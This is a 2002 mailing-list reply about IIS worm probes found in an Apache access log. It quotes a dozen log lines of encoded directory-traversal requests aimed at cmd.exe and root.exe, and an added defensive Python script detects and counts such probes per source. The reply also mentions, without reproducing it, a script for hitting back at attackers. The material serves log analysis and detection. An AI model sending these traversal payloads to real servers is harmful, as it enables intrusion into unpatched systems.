Re: httpd access log question


Subject: Re: httpd access log question
From: Greg Jetter (greg@lazymountain.com)
Date: Wed Jan 16 2002 - 18:34:34 AKST


On Wednesday 16 January 2002 02:29 pm, you wrote:
> Hello all. I was browsing through my httpd access logs on my server today
> and I noticed several lines that were repeated a few dozen times within the
> span of a couple hours, all from the same IP (it looks to be a GCI cable
> modem IP). One of the lines is attached to the end of this message. Other
> than these several blocks all together, there are no other instances I can
> find. My question is, does anyone know what all these accesses might mean?
> It looks like it's trying to find some WinNT/2K files, so I'm thinking it
> might be a "run-of-the-mill" Nimda attempt or something similar. What do
> you all think? Should I be concerned? This was more than a month ago, and I
> don't see anything else since then.
>
> Thanks,
> Justin
> enderak@yahoo.com
>
> --------------------
>
> 24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
> 24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
> 24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
>
>
>
It's one of those Windows IIS viruses or worms; my Apache logs are full of them.
Someone on the list posted a script you can run to bounce back those
attempts at breaking in to whoever sent them. I can't recall just who
posted it, so maybe they will post again.

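A small detection pass over access-log entries like the ones quoted above, added here as an example (it is not the script mentioned on the list). It assumes Apache common log format and runs over constructed sample lines that use documentation addresses rather than the IP from the post; it decodes the double-encoded (%255c) and overlong-UTF-8 (%c0%af, %c1%9c) forms so each probe is recognised as the same cmd.exe traversal, then counts hits per source.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample in Apache common log format, modelled on the quoted
# entries (192.0.2.x / 198.51.100.x are documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Dec/2001:19:22:34 -0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
192.0.2.10 - - [05/Dec/2001:19:22:35 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
192.0.2.10 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
192.0.2.10 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
192.0.2.10 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
198.51.100.7 - - [05/Dec/2001:20:01:02 -0900] "GET /index.html HTTP/1.0" 200 1043
"""

# ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Overlong UTF-8 byte pairs that appear in the quoted probes in place of '/' or '\'
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\", "%c1%1c": "\\"}

def normalize_path(path):
    """Map overlong pairs, decode twice (%255c -> %5c -> \\), then treat \\ as /."""
    lowered = path.lower()
    for enc, sep in OVERLONG.items():
        lowered = lowered.replace(enc, sep)
    decoded = unquote(unquote(lowered))
    return decoded.replace("\\", "/")

def classify(path):
    """Return an indicator label for a request path, or None for ordinary traffic."""
    norm = normalize_path(path)
    if "root.exe" in norm:
        return "root.exe probe"
    if "cmd.exe" in norm:
        return "cmd.exe traversal probe" if "../" in norm else "cmd.exe probe"
    return None

def scan(log_text):
    """Group indicator hits per source IP; returns {ip: Counter(label)}."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        ip, _ts, _method, path, _status, _size = m.groups()
        label = classify(path)
        if label:
            hits[ip][label] += 1
    return hits
```

Run `scan(open("access_log").read())` against a real log and a source that repeats these labels dozens of times in a short window is the pattern the post describes.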



This archive was generated by hypermail 2a23 : Wed Jan 16 2002 - 18:27:55 AKST